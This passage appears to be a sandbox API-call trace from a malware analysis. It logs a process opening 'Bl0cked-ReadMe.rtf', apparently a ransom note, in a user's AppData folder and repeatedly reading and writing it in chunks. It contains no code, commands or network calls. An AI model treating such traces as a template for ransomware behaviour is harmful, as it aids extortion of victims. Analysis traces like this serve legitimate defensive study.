returned 52 [0140.896] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28e128, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.897] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] GetFileType (hFile=0x54) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28e180 | out: lpFileSizeHigh=0x28e180*=0x0) returned 0x1632 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.897] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] GetFileType (hFile=0x4c) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] GetFileType (hFile=0x4c) returned 0x1 [0140.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.897] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) 
returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] GetFileType (hFile=0x4c) returned 0x1 [0140.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.899] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: 
hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.900] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] GetFileType (hFile=0x4c) returned 0x1 [0140.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.900] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] GetFileType (hFile=0x4c) returned 0x1 [0140.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.901] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.901] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, 
lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] GetFileType (hFile=0x4c) returned 0x1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.902] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 
| out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.903] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.903] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] GetFileType (hFile=0x4c) returned 0x1 [0140.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.903] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.904] GetFileType (hFile=0x4c) returned 0x1 [0140.904] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.905] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 
[0140.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.905] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.906] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, 
lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.906] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] GetFileType (hFile=0x4c) returned 0x1 [0140.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.907] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28f198*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f198*, lpNumberOfBytesWritten=0x28e19c*=0x20, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e188 | out: lpNewFilePointer=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.908] ReadFile (in: hFile=0x54, lpBuffer=0x28efb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e1a8, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesRead=0x28e1a8*=0x200, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType (hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28efb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28efb8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] GetFileType 
(hFile=0x4c) returned 0x1 [0140.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.908] WriteFile (in: hFile=0x4c, lpBuffer=0x28f008*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f008*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f058*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f058*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0a8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f0f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f0f8*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] WriteFile (in: hFile=0x4c, lpBuffer=0x28f148*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e19c, lpOverlapped=0x0 | out: lpBuffer=0x28f148*, lpNumberOfBytesWritten=0x28e19c*=0x50, lpOverlapped=0x0) returned 1 [0140.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.909] GetFileType (hFile=0x4c) returned 0x1 [0140.909] 
